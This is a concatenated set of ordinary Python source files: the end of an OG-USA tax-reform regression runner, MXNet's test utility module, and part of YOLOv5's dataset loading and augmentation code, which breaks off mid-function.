# Add start year from reform to user parameters
start_year = sorted(reform.keys())[0]
user_params['start_year'] = start_year
input_dir = baseline_dir
kwargs={'output_base':baseline_dir, 'baseline_dir':baseline_dir,
'baseline':True, 'analytical_mtrs':False, 'age_specific':False,
'user_params':user_params, 'guid':guid, 'run_micro':run_micro}
#p1 = Process(target=runner, kwargs=kwargs)
#p1.start()
runner(**kwargs)
kwargs={'output_base':reform_dir, 'baseline_dir':baseline_dir,
'baseline':False, 'analytical_mtrs':False, 'user_params':user_params,
'reform':reform, 'age_specific':False, 'guid':guid,'run_micro':run_micro}
#p2 = Process(target=runner, kwargs=kwargs)
#p2.start()
runner(**kwargs)
#p1.join()
#print("just joined")
#p2.join()
#time.sleep(0.5)
ans = postprocess.create_diff(baseline_dir=baseline_dir, policy_dir=reform_dir)
print("total time was ", (time.time() - start_time))
print(ans)
return ans
def make_args_from_regression_config():
parser = argparse.ArgumentParser(description='Take reform id and branch from the command line and .regression.txt config from top level of repo')
parser.add_argument('reform', help='Reform such as "reform0", "reform1", "t1", or "t2"')
parser.add_argument('ogusabranch', help='Git branch to install')
args = argparse.Namespace(**REGRESSION_CONFIG)
args2 = parser.parse_args()
args.reform = args2.reform
args.install_ogusa_version = args2.ogusabranch
args.folder = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'standards',
'tc{}_og{}'.format(args.compare_taxcalc_version,
args.compare_ogusa_version))
if args.diff:
args.standard = os.path.join(args.folder, 'results_data_{}.csv'.format(args.reform))
if not os.path.exists(args.folder):
raise ValueError('Cannot diff against Tax-Calculator {} '
'and OG-USA {} because {} does not '
'exist'.format(args.compare_taxcalc_version,
args.compare_ogusa_version,
args.standard))
print('RUN_REFORMS WITH REGRESSION_CONFIG:\n\n{}'.format(pformat(vars(args))))
return args
def main():
args = make_args_from_regression_config()
if bool(getattr(args, 'dry_run_imports_installs_only', False)):
print("DRY_RUN_IMPORTS_INSTALLS_ONLY OK")
return
with open(args.reform_specs_json, "r") as f:
reforms = json.loads(f.read())
reform_num = args.reform
# Run the given reform
if QUICK_RUN:
guid = ''
solution_checks = False
run_micro = False
else:
guid = uuid.uuid1().hex
solution_checks = True
run_micro = True
reform = {int(k):v for k,v in reforms[reform_num].items()}
ans = run_micro_macro(reform=reform, user_params={}, guid=guid,
solution_checks=solution_checks,
run_micro=run_micro)
as_percent = ans * 100
# Dump a "pretty print" version of the answer provided to the web app
cols = list(map(str, range(2016, 2026))) + ["2016-2025"] + ["Steady State"]
rows = ["GDP", "Consumption", "Investment", "Hours Worked", "Wages",
"Interest Rates", "Total Taxes"]
df = pd.DataFrame(data=ans, columns=cols, index=rows)
pd.options.display.float_format = '{:12,.3f}'.format
with open("results_pprint_{}.txt".format(reform_num), 'w') as h:
h.write(df.__repr__())
# Dump the actual data
df.to_csv("results_data_{}.csv".format(reform_num))
if args.diff:
df_released = pd.read_csv(args.standard, index_col=0)
df_diff = df_released - df
# Dump the diff data
fname = "diff_{0}_tc{1}_og{2}_to_master.csv".format(args.reform, args.compare_taxcalc_version, args.compare_ogusa_version)
df_diff.to_csv(fname)
print("END")
if __name__ == "__main__":
main()
|
common.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys, os, logging, functools
import multiprocessing as mp
import mxnet as mx
import numpy as np
import random
import shutil
from mxnet.base import MXNetError
from mxnet.test_utils import environment
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.append(os.path.join(curr_path, '../common/'))
sys.path.insert(0, os.path.join(curr_path, '../../../python'))
import models
from contextlib import contextmanager
import pytest
from tempfile import TemporaryDirectory
import locale
xfail_when_nonstandard_decimal_separator = pytest.mark.xfail(
locale.localeconv()["decimal_point"] != ".",
reason="Some operators break when the decimal separator is set to anything other than \".\". "
"These operators should be rewritten to utilize the new FFI. Please see #18097 for more "
"information."
)
def assertRaises(expected_exception, func, *args, **kwargs):
try:
func(*args, **kwargs)
except expected_exception as e:
pass
else:
# Did not raise exception
assert False, "%s did not raise %s" % (func.__name__, expected_exception.__name__)
def default_logger():
"""A logger used to output seed information to logs."""
logger = logging.getLogger(__name__)
# getLogger() lookups will return the same logger, but only add the handler once.
if not len(logger.handlers):
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(logging.Formatter('[%(levelname)s] %(message)s'))
logger.addHandler(handler)
if (logger.getEffectiveLevel() == logging.NOTSET):
logger.setLevel(logging.INFO)
return logger
@contextmanager
def random_seed(seed=None):
"""
Runs a code block with a new seed for np, mx and python's random.
Parameters
----------
seed : the seed to pass to np.random, mx.random and python's random.
To impose rng determinism, invoke e.g. as in:
with random_seed(1234):
...
To impose rng non-determinism, invoke as in:
with random_seed():
...
Upon conclusion of the block, the rng's are returned to
a state that is a function of their pre-block state, so
any prior non-determinism is preserved.
"""
try:
next_seed = np.random.randint(0, np.iinfo(np.int32).max)
if seed is None:
np.random.seed()
seed = np.random.randint(0, np.iinfo(np.int32).max)
logger = default_logger()
logger.debug('Setting np, mx and python random seeds = %s', seed)
np.random.seed(seed)
mx.random.seed(seed)
random.seed(seed)
yield
finally:
# Reinstate prior state of np.random and other generators
np.random.seed(next_seed)
mx.random.seed(next_seed)
random.seed(next_seed)
def _assert_raise_cuxx_version_not_satisfied(min_version, cfg):
def less_than(version_left, version_right):
"""Compares two version strings in the format num(.[num])*"""
if not version_left or not version_right:
return False
left = version_left.split(".")
right = version_right.split(".")
# 0 pad shortest version - e.g.
# less_than("9.1", "9.1.9") == less_than("9.1.0", "9.1.9")
longest = max(len(left), len(right))
left.extend([0] * (longest - len(left)))
right.extend([0] * (longest - len(right)))
# compare each of the version components
for l, r in zip(left, right):
if l == r:
continue
return int(l) < int(r)
return False
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
cuxx_off = os.getenv(cfg['TEST_OFF_ENV_VAR']) == 'true'
cuxx_env_version = os.getenv(cfg['VERSION_ENV_VAR'], None if cuxx_off else cfg['DEFAULT_VERSION'])
cuxx_test_disabled = cuxx_off or less_than(cuxx_env_version, min_version)
if not cuxx_test_disabled or mx.device.current_device().device_type == 'cpu':
orig_test(*args, **kwargs)
else:
pytest.raises((MXNetError, RuntimeError), orig_test, *args, **kwargs)
return test_new
return test_helper
def assert_raises_cudnn_not_satisfied(min_version):
return _assert_raise_cuxx_version_not_satisfied(min_version, {
'TEST_OFF_ENV_VAR': 'CUDNN_OFF_TEST_ONLY',
'VERSION_ENV_VAR': 'CUDNN_VERSION',
'DEFAULT_VERSION': '7.3.1'
})
def assert_raises_cuda_not_satisfied(min_version):
return _assert_raise_cuxx_version_not_satisfied(min_version, {
'TEST_OFF_ENV_VAR': 'CUDA_OFF_TEST_ONLY',
'VERSION_ENV_VAR': 'CUDA_VERSION',
'DEFAULT_VERSION': '10.1'
})
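# Illustrative usage sketch (not part of the original source): a GPU test that
# needs at least CUDA 10.1. Below that version (or with CUDA_OFF_TEST_ONLY=true)
# the wrapper expects the test body to raise MXNetError or RuntimeError instead.
#
#   @assert_raises_cuda_not_satisfied(min_version='10.1')
#   def test_feature_requiring_cuda_10_1():
#       ...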
def with_environment(*args_):
"""
Helper function that takes a dictionary of environment variables and their
desired settings and changes the environment in advance of running the
decorated code. The original environment state is reinstated afterwards,
even if exceptions are raised.
"""
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
with environment(*args_):
orig_test(*args, **kwargs)
return test_new
return test_helper
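# Illustrative usage sketch (not part of the original source): `environment`
# accepts a dict of variable names to values (as used in run_in_spawned_process
# below), so a test can temporarily pin backend env vars. The variable below is
# only a placeholder.
#
#   @with_environment({'MXNET_ENGINE_TYPE': 'NaiveEngine'})
#   def test_with_naive_engine():
#       ...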
def run_in_spawned_process(func, env, *args):
"""
Helper function to run a test in its own process.
Avoids issues with Singleton- or otherwise-cached environment variable lookups in the backend.
Adds a seed as first arg to propagate determinism.
Parameters
----------
func : function to run in a spawned process.
env : dict of additional environment values to set temporarily in the environment before exec.
args : args to pass to the function.
Returns
-------
Whether the python version supports running the function as a spawned process.
This routine calculates a random seed and passes it into the test as a first argument. If the
test uses random values, it should include an outer 'with random_seed(seed):'. If the
test needs to return values to the caller, consider use of shared variable arguments.
"""
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
return False
else:
seed = np.random.randint(0,1024*1024*1024)
with environment(env):
# Prepend seed as first arg
p = mpctx.Process(target=func, args=(seed,)+args)
p.start()
p.join()
assert p.exitcode == 0, "Non-zero exit code %d from %s()." % (p.exitcode, func.__name__)
return True
def retry(n):
"""Retry n times before failing for stochastic test cases."""
# TODO(szha): replace with flaky
# https://github.com/apache/incubator-mxnet/issues/17803
assert n > 0
def test_helper(orig_test):
@functools.wraps(orig_test)
def test_new(*args, **kwargs):
"""Wrapper for tests function."""
for i in range(n):
try:
orig_test(*args, **kwargs)
return
except AssertionError as e:
if i == n-1:
raise e
mx.nd.waitall()
return test_new
return test_helper
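# Illustrative usage sketch (not part of the original source): rerun a stochastic
# test up to 3 times, re-raising the AssertionError from the final attempt.
#
#   @retry(3)
#   def test_stochastic_op():
#       ...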
|
datasets.py
|
# Dataset utils and dataloaders
import glob
import logging
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
import torch.nn.functional as F
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.general import xyxy2xywh, xywh2xyxy, xywhn2xyxy, xyn2xy, segment2box, segments2boxes, resample_segments, \
clean_str
from utils.torch_utils import torch_distributed_zero_first
# Parameters
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['bmp', 'jpg', 'jpeg', 'png', 'tif', 'tiff', 'dng', 'webp'] # acceptable image suffixes
vid_formats = ['mov', 'avi', 'mp4', 'mpg', 'mpeg', 'm4v', 'wmv', 'mkv'] # acceptable video suffixes
logger = logging.getLogger(__name__)
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(files):
# Returns a single hash value of a list of files
return sum(os.path.getsize(f) for f in files if os.path.isfile(f))
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
def create_dataloader(path, imgsz, batch_size, stride, opt, hyp=None, augment=False, cache=False, pad=0.0, rect=False,
rank=-1, world_size=1, workers=8, image_weights=False, quad=False, prefix=''):
# Make sure only the first process in DDP processes the dataset first, so the following processes can use the cache
with torch_distributed_zero_first(rank):
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augment images
hyp=hyp, # augmentation hyperparameters
rect=rect, # rectangular training
cache_images=cache,
single_cls=opt.single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nw = min([os.cpu_count() // world_size, batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = torch.utils.data.distributed.DistributedSampler(dataset) if rank != -1 else None
loader = torch.utils.data.DataLoader if image_weights else InfiniteDataLoader
# Use torch.utils.data.DataLoader() if dataset.properties will update during training else InfiniteDataLoader()
dataloader = loader(dataset,
batch_size=batch_size,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn)
return dataloader, dataset
class InfiniteDataLoader(torch.utils.data.dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler(object):
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages: # for inference
def __init__(self, path, img_size=640, stride=32):
p = str(Path(path).absolute()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in img_formats]
videos = [x for x in files if x.split('.')[-1].lower() in vid_formats]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {img_formats}\nvideos: {vid_formats}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
# print(f'video {self.count + 1}/{self.nf} ({self.frame}/{self.nframes}) {path}: ', end='')
# print(' ')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
# print(f'image {self.count}/{self.nf} {path}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
if pipe.isnumeric():
pipe = eval(pipe) # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
print(f'webcam {self.count}: ', end='')
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=640, stride=32):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print(f'{i + 1}/{n}: {s}... ', end='')
cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
assert cap.isOpened(), f'Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(f' success ({w}x{h} at {fps:.2f} FPS).')
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride)[0].shape for x in self.imgs], 0) # shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
success, im = cap.retrieve()
self.imgs[index] = im if success else self.imgs[index] * 0
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, self.img_size, auto=self.rect, stride=self.stride)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [x.replace(sa, sb, 1).replace('.' + x.split('.')[-1], '.txt') for x in img_paths]
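# Illustrative sketch (not part of the original source, POSIX-style path): only
# the first /images/ component is swapped and the extension becomes .txt.
#
#   img2label_paths(['coco/images/train2017/000000000009.jpg'])
#   # -> ['coco/labels/train2017/000000000009.txt']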
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('**/*.*')) # pathlib
elif p.is_file(): # file
with open(p, 'r') as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in img_formats]) # pathlib
assert self.img_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {help_url}')
# Check cache
self.label_files = img2label_paths(self.img_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache') # cached labels
if cache_path.is_file():
cache, exists = torch.load(cache_path), True # load
if cache['hash'] != get_hash(self.label_files + self.img_files) or 'version' not in cache: # changed
cache, exists = self.cache_labels(cache_path, prefix), False # re-cache
else:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupted, total
if exists:
d = f"Scanning '{cache_path}' for images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupted"
tqdm(None, desc=prefix + d, total=n, initial=n) # display cache results
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {help_url}'
# Read cache
cache.pop('hash') # remove hash
cache.pop('version') # remove version
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.img_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
if single_cls:
for x in self.labels:
x[:, 0] = 0
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
self.imgs = [None] * n
if cache_images:
gb = 0 # Gigabytes of cached images
self.img_hw0, self.img_hw = [None] * n, [None] * n
results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n))) # 8 threads
pbar = tqdm(enumerate(results), total=n)
for i, x in pbar:
self.imgs[i], self.img_hw0[i], self.img_hw[i] = x # img, hw_original, hw_resized = load_image(self, i)
gb += self.imgs[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB)'
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc = 0, 0, 0, 0 # number missing, found, empty, corrupted
pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
for i, (im_file, lb_file) in enumerate(pbar):
try:
# verify images
im = Image.open(im_file)
im.verify() # PIL verify
shape = exif_size(im) # image size
segments = [] # instance segments
assert (shape[0] > 9) & (shape[1] > 9), f'image size {shape} <10 pixels'
assert im.format.lower() in img_formats, f'invalid image format {im.format}'
# verify labels
if os.path.isfile(lb_file):
nf += 1 # label found
with open(lb_file, 'r') as f:
l = [x.split() for x in f.read().strip().splitlines()]
if any([len(x) > 8 for x in l]): # is segment
classes = np.array([x[0] for x in l], dtype=np.float32)
segments = [np.array(x[1:], dtype=np.float32).reshape(-1, 2) for x in l] # (cls, xy1...)
l = np.concatenate((classes.reshape(-1, 1), segments2boxes(segments)), 1) # (cls, xywh)
l = np.array(l, dtype=np.float32)
if len(l):
assert l.shape[1] == 5, 'labels require 5 columns each'
assert (l >= 0).all(), 'negative labels'
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels'
assert np.unique(l, axis=0).shape[0] == l.shape[0], 'duplicate labels'
else:
ne += 1 # label empty
l = np.zeros((0, 5), dtype=np.float32)
else:
nm += 1 # label missing
l = np.zeros((0, 5), dtype=np.float32)
x[im_file] = [l, shape, segments]
except Exception as e:
nc += 1
print(f'{prefix}WARNING: Ignoring corrupted image and/or label {im_file}: {e}')
pbar.desc = f"{prefix}Scanning '{path.parent / path.stem}' for images and labels... " \
f"{nf} found, {nm} missing, {ne} empty, {nc} corrupted"
if nf == 0:
print(f'{prefix}WARNING: No labels found in {path}. See {help_url}')
x['hash'] = get_hash(self.label_files + self.img_files)
x['results'] = nf, nm, ne, nc, i + 1
x['version'] = 0.1 # cache version
torch.save(x, path) # save for next time
logging.info(f'{prefix}New cache created: {path}')
return x
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
# MixUp https://arxiv.org/pdf/1710.09412.pdf
if random.random() < hyp['mixup']:
img2, labels2 = load_mosaic(self, random.randint(0, self.n - 1))
r = np.random.beta(8.0, 8.0) # mixup ratio, alpha=beta=8.0
img = (img * r + img2 * (1 - r)).astype(np.uint8)
labels = np.concatenate((labels, labels2), 0)
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
# Augment imagespace
if not mosaic:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5]) # convert xyxy to xywh
labels[:, [2, 4]] /= img.shape[0] # normalized height 0-1
labels[:, [1, 3]] /= img.shape[1] # normalized width 0-1
if self.augment:
# flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
# flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
@staticmethod
def collate_fn4(batch):
img, label, path, shapes = zip(*batch) # transposed
n = len(shapes) // 4
img4, label4, path4, shapes4 = [], [], path[:n], shapes[:n]
ho = torch.tensor([[0., 0, 0, 1, 0, 0]])
wo = torch.tensor([[0., 0, 1, 0, 0, 0]])
s = torch.tensor([[1, 1, .5, .5, .5, .5]]) # scale
for i in range(n): # zidane torch.zeros(16,3,720,1280) # BCHW
i *= 4
if random.random() < 0.5:
im = F.interpolate(img[i].unsqueeze(0).float(), scale_factor=2., mode='bilinear', align_corners=False)[
0].type(img[i].type())
l = label[i]
else:
im = torch.cat((torch.cat((img[i], img[i + 1]), 1), torch.cat((img[i + 2], img[i + 3]), 1)), 2)
l = torch.cat((label[i], label[i + 1] + ho, label[i + 2] + wo, label[i + 3] + ho + wo), 0) * s
img4.append(im)
label4.append(l)
for i, l in enumerate(label4):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img4, 0), torch.cat(label4, 0), path4, shapes4
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def hist_equalize(img, clahe=True, bgr=False):
# Equalize histogram on BGR image 'img' with img.shape(n,m,3) and range 0-255
yuv = cv2.cvtColor(img, cv2.COLOR_BGR2YUV if bgr else cv2.COLOR_RGB2YUV)
if clahe:
c = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))
yuv[:, :, 0] = c.apply(yuv[:, :, 0])
else:
